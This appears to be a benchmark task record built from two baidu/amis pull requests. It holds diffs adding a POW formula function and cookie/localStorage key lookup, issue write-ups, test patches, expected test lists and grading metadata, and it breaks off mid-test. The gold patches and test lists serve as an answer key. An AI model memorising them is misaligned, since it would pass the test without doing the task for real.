diff --git a/examples/components/CRUD/List.jsx b/examples/components/CRUD/List.jsx index 15d65c389..18aef7409 100644 --- a/examples/components/CRUD/List.jsx +++ b/examples/components/CRUD/List.jsx @@ -3,32 +3,18 @@ export default { remark: 'bla bla bla', body: { type: 'crud', - api: '/api/sample', + name: 'thelist', + api: { + method: 'get', + url: '/api/sample', + sendOn: '${mode}' + }, mode: 'list', draggable: true, saveOrderApi: { url: '/api/sample/saveOrder' }, orderField: 'weight', - filter: { - title: '条件搜索', - submitText: '', - body: [ - { - type: 'input-text', - name: 'keywords', - placeholder: '通过关键字搜索', - addOn: { - label: '搜索', - type: 'submit' - } - }, - { - type: 'plain', - text: '这只是个示例, 目前搜索对查询结果无效.' - } - ] - }, affixHeader: true, bulkActions: [ { @@ -63,6 +49,44 @@ export default { ], quickSaveApi: '/api/sample/bulkUpdate', quickSaveItemApi: '/api/sample/$id', + headerToolbar: [ + { + type: 'form', + mode: 'inline', + wrapWithPanel: false, + submitOnChange: true, + submitOnInit: true, + target: 'thelist', + body: [ + { + type: 'select', + name: 'mode', + className: 'mb-0', + selectFirst: true, + options: [ + { + label: '模式 1', + value: 'mode1' + }, + { + label: '模式 2', + value: 'mode2' + } + ] + }, + { + type: 'input-text', + name: 'keywords', + placeholder: '通过关键字搜索', + className: 'mb-0', + addOn: { + label: '搜索', + type: 'submit' + } + } + ] + } + ], listItem: { actions: [ { diff --git a/packages/amis-core/src/WithStore.tsx b/packages/amis-core/src/WithStore.tsx index 6e1c37aee..6c9a0d4b9 100644 --- a/packages/amis-core/src/WithStore.tsx +++ b/packages/amis-core/src/WithStore.tsx @@ -252,7 +252,7 @@ export function HocStoreFactory(renderer: { props.store?.storeType === 'ComboStore' ? undefined : syncDataFromSuper( - store.data, + props.data, (props.data as any).__super, (prevProps.data as any).__super, store, diff --git a/packages/amis-core/src/store/crud.ts b/packages/amis-core/src/store/crud.ts index dc2df1cc6..d254a63f5 100644 --- a/packages/amis-core/src/store/crud.ts +++ b/packages/amis-core/src/store/crud.ts @@ -61,12 +61,11 @@ export const CRUDStore = ServiceStore.named('CRUDStore') // 因为会把数据呈现在地址栏上。 return createObject( createObject(self.data, { - ...self.query, items: self.items.concat(), selectedItems: self.selectedItems.concat(), unSelectedItems: self.unSelectedItems.concat() }), - {} + {...self.query} ); }, diff --git a/packages/amis-editor/src/renderer/FormulaControl.tsx b/packages/amis-editor/src/renderer/FormulaControl.tsx index 84b6d5824..b6c03d110 100644 --- a/packages/amis-editor/src/renderer/FormulaControl.tsx +++ b/packages/amis-editor/src/renderer/FormulaControl.tsx @@ -515,21 +515,13 @@ export default class FormulaControl extends React.Component< } else { curRendererSchema.placeholder = '请输入静态值'; } - // 设置popOverContainer - if (!curRendererSchema.popOverContainer) { - curRendererSchema.popOverContainer = window.document.body; - } } JSONPipeOut(curRendererSchema); // 对 schema 进行国际化翻译 if (this.appLocale && this.appCorpusData) { - return translateSchema( - curRendererSchema, - this.appCorpusData, - (item: any) => item.__reactFiber || item.__reactProp // 在nextjs 13中,window.document.body对象,有__reactFiber,__reactProp 两个子对象,递归遍历会导致死循环,因此过滤掉 - ); + return translateSchema(curRendererSchema, this.appCorpusData); } return curRendererSchema; diff --git a/packages/amis-formula/src/doc.md b/packages/amis-formula/src/doc.md index f571ac097..37b95f335 100644 --- a/packages/amis-formula/src/doc.md +++ b/packages/amis-formula/src/doc.md @@ -268,6 +268,17 @@ 取数据最后一个。 +### POW + +用法:`POW(base, exponent)` + + * `base:number` 基数 + * `exponent:number` 指数 + +返回:`number` 基数的指数次幂 + +返回基数的指数次幂,参数base为基数,exponent为指数,如果参数值不合法则返回基数本身,计算结果不合法,则返回NaN。 + ## 文本函数 ### LEFT diff --git a/packages/amis-formula/src/doc.ts b/packages/amis-formula/src/doc.ts index c3a72cf65..5291b3029 100644 --- a/packages/amis-formula/src/doc.ts +++ b/packages/amis-formula/src/doc.ts @@ -465,6 +465,29 @@ export const doc: { }, namespace: '数学函数' }, + { + name: 'POW', + description: + '返回基数的指数次幂,参数base为基数,exponent为指数,如果参数值不合法则返回基数本身,计算结果不合法,则返回NaN。', + example: 'POW(base, exponent)', + params: [ + { + type: 'number', + name: 'base', + description: '基数' + }, + { + type: 'number', + name: 'exponent', + description: '指数' + } + ], + returns: { + type: 'number', + description: '基数的指数次幂' + }, + namespace: '数学函数' + }, { name: 'LEFT', description: '返回传入文本左侧的指定长度字符串。', diff --git a/packages/amis-formula/src/evalutor.ts b/packages/amis-formula/src/evalutor.ts index 7befa4b79..8e44dc051 100644 --- a/packages/amis-formula/src/evalutor.ts +++ b/packages/amis-formula/src/evalutor.ts @@ -13,6 +13,7 @@ import uniqBy from 'lodash/uniqBy'; import isEqual from 'lodash/isEqual'; import isPlainObject from 'lodash/isPlainObject'; import get from 'lodash/get'; +import isNumber from 'lodash/isNumber'; import {EvaluatorOptions, FilterContext, FilterMap, FunctionMap} from './types'; import {FormulaEvalError} from './error'; @@ -978,6 +979,24 @@ export class Evaluator { return arr.length ? arr[arr.length - 1] : null; } + /** + * 返回基数的指数次幂,参数base为基数,exponent为指数,如果参数值不合法则返回基数本身,计算结果不合法,则返回NaN。 + * + * @example POW(base, exponent) + * @param {number} base 基数 + * @param {number} exponent 指数 + * @namespace 数学函数 + * + * @returns {number} 基数的指数次幂 + */ + fnPOW(base: number, exponent: number) { + if (!isNumber(base) || !isNumber(exponent)) { + return base; + } + + return Math.pow(base, exponent); + } + // 文本函数 normalizeText(raw: any) {
feat: 表达式新增幂函数(Math.pow) ### What <!-- copilot:summary --> ### <samp>🤖 Generated by Copilot at 29bf446</samp> This pull request adds a new `POW` function to the amis-formula package, which allows users to calculate the power of a base value raised to an exponent. It also updates the unit tests, documentation, and type definitions to reflect the new function. The `POW` function depends on the `lodash` library for input validation. <!-- copilot:poem --> ### <samp>🤖 Generated by Copilot at 29bf446</samp> > _Raise your base to the power of doom_ > _With the `POW` function you can consume_ > _The formula evaluator is your tool_ > _But beware of the `lodash` rule_ ### Why <!-- author to complete --> ### How <!-- copilot:walkthrough --> ### <samp>🤖 Generated by Copilot at 29bf446</samp> * Implement and document the `POW` function for calculating the power of a base number raised to an exponent ([link](https://github.com/baidu/amis/pull/8370/files?diff=unified&w=0#diff-7b71709bd7fd59b58ead9b5afe05ad9246be16aab6cecedc09ca0decdda60e29R271-R281), [link](https://github.com/baidu/amis/pull/8370/files?diff=unified&w=0#diff-fe7d53117fd0fe0e9a0ee5f555c8b3a9abf519a84ce84783443613f5c9bf5d40R469-R491), [link](https://github.com/baidu/amis/pull/8370/files?diff=unified&w=0#diff-6e98a1dfcecf7c45fc01fdf27b5c21e037dc90466a0761a63998e1736958b433R982-R999)) * Import the `isNumber` function from `lodash` to check the input parameters in `evalutor.ts` ([link](https://github.com/baidu/amis/pull/8370/files?diff=unified&w=0#diff-6e98a1dfcecf7c45fc01fdf27b5c21e037dc90466a0761a63998e1736958b433R16)) * Use the `Math.pow` method to calculate the power and handle invalid inputs in `evalutor.ts` ([link](https://github.com/baidu/amis/pull/8370/files?diff=unified&w=0#diff-6e98a1dfcecf7c45fc01fdf27b5c21e037dc90466a0761a63998e1736958b433R982-R999)) * Add a JSDoc comment for the `POW` function in `evalutor.ts` ([link](https://github.com/baidu/amis/pull/8370/files?diff=unified&w=0#diff-6e98a1dfcecf7c45fc01fdf27b5c21e037dc90466a0761a63998e1736958b433R982-R999)) * Add a documentation section for the `POW` function in `doc.md` ([link](https://github.com/baidu/amis/pull/8370/files?diff=unified&w=0#diff-7b71709bd7fd59b58ead9b5afe05ad9246be16aab6cecedc09ca0decdda60e29R271-R281)) * Add a documentation object for the `POW` function in `doc.ts` ([link](https://github.com/baidu/amis/pull/8370/files?diff=unified&w=0#diff-fe7d53117fd0fe0e9a0ee5f555c8b3a9abf519a84ce84783443613f5c9bf5d40R469-R491)) * Add a unit test for the `POW` function in `evalute.test.ts` ([link](https://github.com/baidu/amis/pull/8370/files?diff=unified&w=0#diff-12afc0d8fc19329d900d849d7b791da51b3e399126e9e38059c4a30ba33e9c9dR542-R564)) * Cover various cases of valid and invalid inputs and outputs for the `POW` function ([link](https://github.com/baidu/amis/pull/8370/files?diff=unified&w=0#diff-12afc0d8fc19329d900d849d7b791da51b3e399126e9e38059c4a30ba33e9c9dR542-R564))
**Title** Add exponentiation support and correct CRUD/store handling **Problem** - Formulas had no built‑in way to compute a power, limiting mathematical expressions. - The CRUD example and its underlying store lost query information and could sync stale data, leading to incorrect API calls. - Schema translation in the formula editor could trigger infinite recursion in certain runtime environments. **Root Cause** - The evaluator lacked a POW implementation and proper numeric validation. - Store merging omitted the current query and the HOC passed the wrong data reference. - The editor added a pop‑over container that conflicted with React internals, causing recursion during translation. **Fix / Expected Behavior** - Provide a POW function that returns `baseⁿ`, validates inputs, and returns the base or NaN on invalid data. - Document the new function and update type definitions accordingly. - Enable the CRUD example to send a selectable mode parameter and expose an inline search toolbar. - Synchronize the CRUD store using the latest data prop and retain query parameters when rebuilding state. - Remove the problematic pop‑over container handling and simplify schema translation to avoid recursive traversal. **Risk & Validation** - Verify that existing formulas continue to evaluate correctly after adding POW. - Test CRUD list interactions, ensuring mode selection and search trigger the expected API requests with proper query data. - Run the editor’s translation flow in environments with Next.js to confirm the recursion issue is resolved.
8,370
baidu/amis
diff --git a/packages/amis-formula/__tests__/evalute.test.ts b/packages/amis-formula/__tests__/evalute.test.ts index 4670b3906..2fb97d99a 100644 --- a/packages/amis-formula/__tests__/evalute.test.ts +++ b/packages/amis-formula/__tests__/evalute.test.ts @@ -539,3 +539,26 @@ test('evalute:ISTYPE', () => { expect(evaluate('${ISTYPE(f, "plain-object")}', data)).toBe(true); expect(evaluate('${ISTYPE(g, "date")}', data)).toBe(true); }); + +test('evalute:Math', () => { + const data = { + float: 0.5, + integer1: 2, + integer2: 4, + negativeInteger: -2, + array: [1, 2 ,3], + infinity: Infinity + } + + expect(evaluate('${POW(integer1, integer2)}', data)).toBe(16); + expect(evaluate('${POW(integer2, 0.5)}', data)).toBe(2); + expect(evaluate('${POW(integer1, -2)}', data)).toBe(0.25); + /** 计算结果不合法,则返回NaN */ + expect(evaluate('${POW(negativeInteger, 0.5)}', data)).toBe(NaN); + /** 参数值不合法,则返回基数本身*/ + expect(evaluate('${POW(array, 2)}', data)).toBe(data.array); + /** 测试Infinity */ + expect(evaluate('${POW(infinity, 2)}', data)).toBe(data.infinity); + expect(evaluate('${POW(1, infinity)}', data)).toBe(NaN); + expect(evaluate('${POW(2, infinity)}', data)).toBe(data.infinity); +})
[ "evalute:Math" ]
[ "evalute:simple", "evalute:filter", "evalute:filter2", "evalute:filter3", "evalute:filter4", "evalute:keywords", "evalute:oldVariable", "evalute:ariable2", "evalute:ariable3", "evalute:object-variable", "evalute:literal-variable", "evalute:tempalte", "evalute:literal", "evalute:variableName", "evalute:3-1", "evalate:0.1+0.2", "evalute:variable:com.xxx.xx", "evalute:anonymous:function", "evalute:anonymous:function2", "evalute:array:func", "evalute:ISTYPE", "parser:simple", "parser:complex", "parser:evalMode", "parser:template", "parser:string", "parser:number", "parser:single-string", "parser:object-literall", "parser:array-literall", "parser:variable-geter", "parser:variable-geter2", "parser:multi-expression", "parser:functionCall", "parser:filter", "parser:filter-escape", "parser:conditional", "parser:binary-expression", "parser:group-expression", "parser:unary-expression", "parser:anonymous-function", "lexer:simple", "lexer:filter", "lexer:exception", "formula:expression", "formula:expression2", "formula:expression3", "formula:if", "formula:and", "formula:or", "formula:xor", "formula:ifs", "formula:math", "formula:text", "formula:date", "formula:last", "formula:basename", "formula:customFunction" ]
Method: Evaluator.fnPOW(base: number, exponent: number) Location: packages/amis-formula/src/evalutor.ts Inputs: - **base** – `number` | any – the base value; if the value is not a number the function returns it unchanged. - **exponent** – `number` | any – the exponent; if the value is not a number the function returns the base unchanged. Outputs: `number` – result of `Math.pow(base, exponent)`. Returns the original **base** when either argument is non‑numeric; if the mathematical result is not a valid number (e.g., negative base with fractional exponent) it yields `NaN`. Description: Provides the `POW` formula function used in `${POW(... )}` expressions to compute exponentiation. Handles input validation via `lodash/isNumber` and forwards to `Math.pow`, returning the base for invalid inputs and `NaN` for invalid results.
custom-check-github
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "cd packages/amis-formula && npx jest --verbose --no-color" }
{ "num_modified_files": 7, "num_modified_lines": 100, "pr_author": "lurunze1226", "pr_labels": [ "feat" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.97, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [ "https://github.com/baidu/amis/pull/8370/files?diff=unified&w=0#diff-7b71709bd7fd59b58ead9b5afe05ad9246be16aab6cecedc09ca0decdda60e29R271-R281", "https://github.com/baidu/amis/pull/8370/files?diff=unified&w=0#diff-fe7d53117fd0fe0e9a0ee5f555c8b3a9abf519a84ce84783443613f5c9bf5d40R469-R491", "https://github.com/baidu/amis/pull/8370/files?diff=unified&w=0#diff-6e98a1dfcecf7c45fc01fdf27b5c21e037dc90466a0761a63998e1736958b433R982-R999" ], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests adding a POW function to the formula evaluator with clear behavior (valid numbers compute Math.pow, invalid inputs return base or NaN) and provides unit tests that verify these cases. The tests directly assert the described behavior and do not introduce unrelated expectations. There are no signals of missing names, external info, ambiguous specs, or hidden knowledge, so the task is well‑specified and solvable.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
6f599d5d939201ad5b809001425b333b87c6ec12
2023-10-13 09:45:51
github-actions[bot]: <!-- Labeler (https://github.com/jimschubert/labeler) --> 👍 Thanks for this! 🏷 I have applied any labels matching special text in your issue. Please review the labels and make any necessary changes.
baidu__amis-8385
diff --git a/docs/zh-CN/types/classname.md b/docs/zh-CN/types/classname.md index fbfa53d12..049ac855c 100644 --- a/docs/zh-CN/types/classname.md +++ b/docs/zh-CN/types/classname.md @@ -12,7 +12,9 @@ amis 中大部分的组件都支持配置 className 和 xxxClassName,他可以 配置方式有两种: 1. 直接配置字符串如:`className: "text-danger"` 文字标红。 -2. 采用对象配置,这个用法主要是方便写表达式如:`className: {"text-danger": "this.status == 1"}` 表示当数据 status 状态是 1 时,文字飘红。 +2. 采用对象配置,这个用法主要是方便写表达式如:`className: {"text-danger": "${status == 1}"}` 表示当数据 status 状态是 1 时,文字飘红。 + +> 注意 3.5 版本开始类名中支持表达式如: `text-${status == 1 ? 'danger' : 'success'}` ```schema { @@ -46,8 +48,9 @@ amis 中大部分的组件都支持配置 className 和 xxxClassName,他可以 "2": "在线" }, "className": { - "text-muted": "this.status == '1'", - "text-success": "this.status == '2'" + "text-muted": "${status == 1}", + "text-success": "${status == 2}", + "text-${status}": true } } ] diff --git a/packages/amis-core/src/utils/filter-schema.ts b/packages/amis-core/src/utils/filter-schema.ts index 752e61c49..0e9203b22 100644 --- a/packages/amis-core/src/utils/filter-schema.ts +++ b/packages/amis-core/src/utils/filter-schema.ts @@ -3,6 +3,7 @@ import {PlainObject} from '../types'; import {injectPropsToObject, mapObject} from './helper'; import isPlainObject from 'lodash/isPlainObject'; import cx from 'classnames'; +import {tokenize} from './tokenize'; /** * 处理 Props 数据,所有带 On 结束的做一次 @@ -29,17 +30,18 @@ export function getExprProperties( } let parts = /^(.*)(On|Expr|(?:c|C)lassName)(Raw)?$/.exec(key); + const type = parts?.[2]; let value: any = schema[key]; if ( value && typeof value === 'string' && parts?.[1] && - (parts[2] === 'On' || parts[2] === 'Expr') + (type === 'On' || type === 'Expr') ) { key = parts[1]; - if (parts[2] === 'On' || parts[2] === 'Expr') { + if (type === 'On' || type === 'Expr') { if ( !ctx && props && @@ -51,7 +53,7 @@ export function getExprProperties( }); } - if (parts[2] === 'On') { + if (type === 'On') { value = props?.[key] || evalExpression(value, ctx || data); } else { value = filter(value, ctx || data); @@ -60,17 +62,22 @@ export function getExprProperties( exprProps[key] = value; } else if ( + (type === 'className' || type === 'ClassName') && + !props?.[key] && // 如果 props 里面有则是 props 优先 value && - isPlainObject(value) && - (parts?.[2] === 'className' || parts?.[2] === 'ClassName') + (typeof value === 'string' || isPlainObject(value)) ) { - key = parts[1] + parts[2]; exprProps[`${key}Raw`] = value; - exprProps[key] = cx( - mapObject(value, (value: any) => - typeof value === 'string' ? evalExpression(value, data) : value - ) - ); + exprProps[key] = + typeof value === 'string' + ? tokenize(value, data) + : mapObject( + value, + (value: any) => + typeof value === 'string' ? evalExpression(value, data) : value, + undefined, + (key: string) => tokenize(key, data) + ); } }); diff --git a/packages/amis-core/src/utils/helper.ts b/packages/amis-core/src/utils/helper.ts index 71ddc701d..ff3ee484b 100644 --- a/packages/amis-core/src/utils/helper.ts +++ b/packages/amis-core/src/utils/helper.ts @@ -1566,8 +1566,9 @@ export function chainEvents(props: any, schema: any) { export function mapObject( value: any, - fn: Function, - skipFn?: (value: any) => boolean + valueMapper: (value: any) => any, + skipFn?: (value: any) => boolean, + keyMapper?: (key: string) => string ): any { // 如果value值满足skipFn条件则不做map操作 skipFn = @@ -1582,26 +1583,29 @@ export function mapObject( return false; }; - if (!!skipFn(value)) { + if (skipFn(value)) { return value; } if (Array.isArray(value)) { - return value.map(item => mapObject(item, fn, skipFn)); + return value.map(item => mapObject(item, valueMapper, skipFn, keyMapper)); } if (isObject(value)) { - let tmpValue = {...value}; - Object.keys(tmpValue).forEach(key => { - (tmpValue as PlainObject)[key] = mapObject( - (tmpValue as PlainObject)[key], - fn, - skipFn + let tmpValue = {}; + Object.keys(value).forEach(key => { + const newKey = keyMapper ? keyMapper(key) : key; + + (tmpValue as PlainObject)[newKey] = mapObject( + (value as PlainObject)[key], + valueMapper, + skipFn, + keyMapper ); }); return tmpValue; } - return fn(value); + return valueMapper(value); } export function loadScript(src: string) { diff --git a/packages/amis-formula/src/evalutor.ts b/packages/amis-formula/src/evalutor.ts index 6f85541d1..92cdc2f67 100644 --- a/packages/amis-formula/src/evalutor.ts +++ b/packages/amis-formula/src/evalutor.ts @@ -366,17 +366,65 @@ export class Evaluator { return ast.value; } + /** + * 名字空间下获取变量,可能存在变量名中带-的特殊情况,目前无法直接获取 ${ns:xxx-xxx} + * 想借助 ${ns:&['xxx-xxx']} 用法来支持特殊字符。 + * + * 而 cookie, localstorage, sessionstorage 都不支持获取全量数据,如 ${ns: &} + * 所以当存在上述用法时,将 & 作为一个占位 + * + * 比如 cookie 中有一个 key 为 xxx-xxx 的值,那么可以通过 &['xxx-xxx'] 来获取。 + * 而无法通过 ${cookie:xxx-xxx} 来获取。 因为这样会被认为是减操作 + * @param ast + * @returns + */ + convertHostGetterToVariable(ast: any) { + if (ast.type !== 'getter') { + return ast; + } + + let gettter = ast; + const keys: Array<string> = []; + while (gettter.host?.type === 'getter') { + keys.push('host'); + gettter = gettter.host; + } + if (gettter.host?.type === 'variable' && gettter.host.name === '&') { + const ret: any = { + host: ast + }; + const host = keys.reduce((host, key) => { + host[key] = {...host[key]}; + return host[key]; + }, ret); + + host.host = { + start: host.host.start, + end: host.host.end, + type: 'variable', + name: this.evalute(host.host.key) + }; + return ret.host; + } + return ast; + } + nsVariable(ast: {namespace: string; body: any}) { + let body = ast.body; if (ast.namespace === 'window') { this.contextStack.push((name: string) => name === '&' ? window : (window as any)[name] ); } else if (ast.namespace === 'cookie') { + // 可能会利用 &['xxx-xxx'] 来取需要特殊变量 + body = this.convertHostGetterToVariable(body); this.contextStack.push((name: string) => { return getCookie(name); }); } else if (ast.namespace === 'ls' || ast.namespace === 'ss') { const ns = ast.namespace; + // 可能会利用 &['xxx-xxx'] 来取需要特殊变量 + body = this.convertHostGetterToVariable(body); this.contextStack.push((name: string) => { const raw = ns === 'ss' @@ -400,8 +448,10 @@ export class Evaluator { throw new Error('Unsupported namespace: ' + ast.namespace); } - const result = this.evalute(ast.body); - this.contextStack.pop(); + const result = this.evalute(body); + result?.then + ? result.then(() => this.contextStack.pop()) + : this.contextStack.pop(); return result; } diff --git a/packages/amis-ui/package.json b/packages/amis-ui/package.json index 5e0e14f9d..c886f905b 100644 --- a/packages/amis-ui/package.json +++ b/packages/amis-ui/package.json @@ -36,8 +36,8 @@ }, "dependencies": { "@rc-component/mini-decimal": "^1.0.1", - "amis-core": "^3.4.2", - "amis-formula": "^3.4.2", + "amis-core": "*", + "amis-formula": "*", "classnames": "2.3.2", "codemirror": "^5.63.0", "downshift": "6.1.12", diff --git a/packages/amis/package.json b/packages/amis/package.json index 1046c70ee..a72d7d2de 100644 --- a/packages/amis/package.json +++ b/packages/amis/package.json @@ -37,8 +37,8 @@ } ], "dependencies": { - "amis-core": "^3.4.2", - "amis-ui": "^3.4.2", + "amis-core": "*", + "amis-ui": "*", "attr-accept": "2.2.2", "blueimp-canvastoblob": "2.1.0", "classnames": "2.3.2",
feat: formula 取 cookie, localstorage, sessionstorage支持 &['xxx'] 来获取复杂变量名数据 Close: #8376 ### What <!-- copilot:summary --> ### <samp>🤖 Generated by Copilot at 1b4c5a7</samp> This pull request updates the amis, amis-core, amis-ui, and amis-formula packages to version `3.4.2`, which includes bug fixes and new features for the amis framework. It also improves the testing and formatting of the amis-formula package, adds a new method to handle local storage values with hyphens, and enables Lerna to use Yarn workspaces. Additionally, it removes the amis-editor packages from the monorepo, as they have been moved to a separate repository. <!-- copilot:poem --> ### <samp>🤖 Generated by Copilot at 1b4c5a7</samp> > _We are the masters of the monorepo_ > _We use `lerna` and `yarn` to control the flow_ > _We fix the bugs and add the features_ > _We test the formulas and update the versions_ ### Why Close: #8376 ### How <!-- copilot:walkthrough --> ### <samp>🤖 Generated by Copilot at 1b4c5a7</samp> * Enable Lerna to use Yarn workspaces and update version of amis packages to 3.4.2 ([link](https://github.com/baidu/amis/pull/8385/files?diff=unified&w=0#diff-2d72bdead8afa0798d18995311992d684348a694c2d5e214e8e4d2b6153e4821L8-R9), [link](https://github.com/baidu/amis/pull/8385/files?diff=unified&w=0#diff-7ae45ad102eab3b6d7e7896acd08c427a9b25b346470d7bc6507b6481575d519L7-R7), [link](https://github.com/baidu/amis/pull/8385/files?diff=unified&w=0#diff-2461f3811423634aee38270e1d12bcf581b95eb845cb00a3ea5eae804a57795cL3-R3), [link](https://github.com/baidu/amis/pull/8385/files?diff=unified&w=0#diff-2461f3811423634aee38270e1d12bcf581b95eb845cb00a3ea5eae804a57795cL49-R49), [link](https://github.com/baidu/amis/pull/8385/files?diff=unified&w=0#diff-2a1582dd8536cd65b762f9cd79719e90b98bdc38b808db0aaf783039f53d4153L3-R3), [link](https://github.com/baidu/amis/pull/8385/files?diff=unified&w=0#diff-0e30bcb7b6942e615a81bbcc87d75a7279e22d52e521bd61e050c056f6efe78cL6-R6), [link](https://github.com/baidu/amis/pull/8385/files?diff=unified&w=0#diff-0e30bcb7b6942e615a81bbcc87d75a7279e22d52e521bd61e050c056f6efe78cL39-R40), [link](https://github.com/baidu/amis/pull/8385/files?diff=unified&w=0#diff-b49028542a3bb14de6e47e46a9f09f23ffeff3afea2a17d5ddace75726a33e12L3-R3), [link](https://github.com/baidu/amis/pull/8385/files?diff=unified&w=0#diff-b49028542a3bb14de6e47e46a9f09f23ffeff3afea2a17d5ddace75726a33e12L40-R41)) * Add support for accessing local storage values using the `ls` namespace in `amis-formula` expressions ([link](https://github.com/baidu/amis/pull/8385/files?diff=unified&w=0#diff-420dc4637078b9360fdc9b60177e5b57b5fd9bde9e43e2aeaf4e6521834043c2R590-R619), [link](https://github.com/baidu/amis/pull/8385/files?diff=unified&w=0#diff-12afc0d8fc19329d900d849d7b791da51b3e399126e9e38059c4a30ba33e9c9dL549-R551), [link](https://github.com/baidu/amis/pull/8385/files?diff=unified&w=0#diff-12afc0d8fc19329d900d849d7b791da51b3e399126e9e38059c4a30ba33e9c9dL564-R582), [link](https://github.com/baidu/amis/pull/8385/files?diff=unified&w=0#diff-6e98a1dfcecf7c45fc01fdf27b5c21e037dc90466a0761a63998e1736958b433L369-R413), [link](https://github.com/baidu/amis/pull/8385/files?diff=unified&w=0#diff-6e98a1dfcecf7c45fc01fdf27b5c21e037dc90466a0761a63998e1736958b433R419-R420), [link](https://github.com/baidu/amis/pull/8385/files?diff=unified&w=0#diff-6e98a1dfcecf7c45fc01fdf27b5c21e037dc90466a0761a63998e1736958b433R426-R427), [link](https://github.com/baidu/amis/pull/8385/files?diff=unified&w=0#diff-6e98a1dfcecf7c45fc01fdf27b5c21e037dc90466a0761a63998e1736958b433L403-R454)) * Fix formatting issue in `evalute.test.ts` ([link](https://github.com/baidu/amis/pull/8385/files?diff=unified&w=0#diff-12afc0d8fc19329d900d849d7b791da51b3e399126e9e38059c4a30ba33e9c9dL549-R551))
**Title** Enable dynamic class name expressions and support special‑character keys in cookie/localStorage/sessionStorage namespaces **Problem** - `className` objects could only contain static values; expression strings and dynamic keys were not evaluated, limiting UI styling flexibility. - Variables whose names contain characters such as `-` could not be accessed from cookie, localStorage, or sessionStorage, preventing use of realistic key names. **Root Cause** - The schema filtering logic treated class name objects as plain data and did not apply expression parsing or key tokenisation. - The expression evaluator lacked a mechanism to reference special‑character keys via a placeholder syntax, and the utility for object mapping could not transform object keys during traversal. **Fix / Expected Behavior** - Extend schema processing to evaluate class name objects, applying expression parsing to values and tokenising both values and keys (e.g., `text-${status}` or conditional classes). - Introduce support for a placeholder syntax (`&['key']`) that allows cookie, localStorage, and sessionStorage lookups of keys containing hyphens or other non‑identifier characters. - Enhance the generic object‑mapping helper to accept an optional key‑mapping function, enabling key tokenisation without altering existing behaviour. - Update documentation to illustrate the new class name expression capabilities and the placeholder syntax for storage namespaces. - Align internal package references to use workspace links rather than fixed version numbers. **Risk & Validation** - Changing the object‑mapping helper may affect other utilities; run the full test suite to confirm no regressions. - Verify that dynamic class name generation produces the correct class strings across all components. - Add unit tests for storage namespace lookups using the `&['key']` syntax and ensure they work for cookie, localStorage, and sessionStorage.
8,385
baidu/amis
diff --git a/packages/amis-formula/__tests__/async-evalute.test.ts b/packages/amis-formula/__tests__/async-evalute.test.ts index 18bcdf6a6..bd0e6fc1c 100644 --- a/packages/amis-formula/__tests__/async-evalute.test.ts +++ b/packages/amis-formula/__tests__/async-evalute.test.ts @@ -587,3 +587,33 @@ test('evalute:ISTYPE', async () => { ); expect(await evaluateForAsync('${ISTYPE(g, "date")}', data)).toBe(true); }); + +test('async-evalute:namespace', async () => { + localStorage.setItem('a', '1'); + localStorage.setItem('b', '2'); + localStorage.setItem('c', '{"a": 1, "b": 2, "c": {"d": 4}}'); + localStorage.setItem('key', 'c'); + localStorage.setItem('spec-var-name', 'you are right'); + + expect(await evaluateForAsync('${ls: a}', {})).toBe(1); + expect(await evaluateForAsync('${ls: b}', {})).toBe(2); + expect(await evaluateForAsync('${ls: c}', {})).toMatchObject({ + a: 1, + b: 2, + c: {d: 4} + }); + // 被认为是减操作 + expect(await evaluateForAsync('${ls: spec-var-name}', {})).toBe(0); + expect(await evaluateForAsync('${ls: spec\\-var\\-name}', {})).toBe( + 'you are right' + ); + expect(await evaluateForAsync('${ls: &["spec-var-name"]}', {})).toBe( + 'you are right' + ); + expect(await evaluateForAsync('${ls: &["c"]["c"]}', {})).toMatchObject({ + d: 4 + }); + expect(await evaluateForAsync('${ls: &["c"][key]}', {})).toMatchObject({ + d: 4 + }); +}); diff --git a/packages/amis-formula/__tests__/evalute.test.ts b/packages/amis-formula/__tests__/evalute.test.ts index 2fb97d99a..fb30171c4 100644 --- a/packages/amis-formula/__tests__/evalute.test.ts +++ b/packages/amis-formula/__tests__/evalute.test.ts @@ -546,9 +546,9 @@ test('evalute:Math', () => { integer1: 2, integer2: 4, negativeInteger: -2, - array: [1, 2 ,3], + array: [1, 2, 3], infinity: Infinity - } + }; expect(evaluate('${POW(integer1, integer2)}', data)).toBe(16); expect(evaluate('${POW(integer2, 0.5)}', data)).toBe(2); @@ -561,4 +561,22 @@ test('evalute:Math', () => { expect(evaluate('${POW(infinity, 2)}', data)).toBe(data.infinity); expect(evaluate('${POW(1, infinity)}', data)).toBe(NaN); expect(evaluate('${POW(2, infinity)}', data)).toBe(data.infinity); -}) +}); + +test('evalute:namespace', () => { + localStorage.setItem('a', '1'); + localStorage.setItem('b', '2'); + localStorage.setItem('c', '{"a": 1, "b": 2, "c": {"d": 4}}'); + localStorage.setItem('key', 'c'); + localStorage.setItem('spec-var-name', 'you are right'); + + expect(evaluate('${ls: a}', {})).toBe(1); + expect(evaluate('${ls: b}', {})).toBe(2); + expect(evaluate('${ls: c}', {})).toMatchObject({a: 1, b: 2, c: {d: 4}}); + // 被认为是减操作 + expect(evaluate('${ls: spec-var-name}', {})).toBe(0); + expect(evaluate('${ls: spec\\-var\\-name}', {})).toBe('you are right'); + expect(evaluate('${ls: 